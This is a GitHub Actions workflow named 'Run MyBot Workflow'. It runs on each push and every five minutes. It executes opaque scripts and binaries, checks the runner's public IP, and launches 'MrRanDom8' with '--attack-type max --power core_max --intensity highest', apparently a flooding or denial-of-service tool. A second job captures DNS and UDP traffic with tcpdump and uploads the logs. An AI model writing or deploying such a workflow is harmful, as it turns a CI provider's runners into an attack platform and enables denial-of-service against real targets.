name: Run MyBot Workflow

on:
  push:
    branches:
      - main
  schedule:
    - cron: '*/5 * * * *'

concurrency:  
  group: mybot-workflow-group
  cancel-in-progress: true

jobs:
  run_mybot_workflow:
    runs-on: ubuntu-latest

    steps:
      - name: Check out the code
        uses: actions/checkout@v3

      - name: Set permissions for balveer.sh and ranbal binary
        run: |
          chmod +x balveer.sh ranbal  

      - name: Run balveer.sh for dependencies (one-time setup)
        run: |
          ./balveer.sh
          
      - name: Check DNS Server
        run: cat /etc/resolv.conf && curl ipinfo.io

      - name: Execution of MrRanDom8
        run: |
          ./MrRanDom8 --attack-type max --power core_max --intensity highest

  capture_packets:
    runs-on: ubuntu-latest

    steps:
      - name: Install tcpdump
        run: |
          sudo apt-get update
          sudo apt-get install -y tcpdump

      - name: Capture DNS traffic
        run: |
          echo "Starting DNS packet capture..."
          sudo tcpdump -i any port 53 -vvv -c 50 -w dns_traffic.log

      - name: Capture UDP traffic
        run: |
          echo "Starting UDP packet capture..."
          sudo tcpdump -i any udp -nn -tttt -c 50 -w udp_traffic.log

      - name: Upload DNS traffic logs
        uses: actions/upload-artifact@v3
        with:
          name: dns-traffic-logs
          path: dns_traffic.log

      - name: Upload UDP traffic logs
        uses: actions/upload-artifact@v3
        with:
          name: udp-traffic-logs
          path: udp_traffic.log
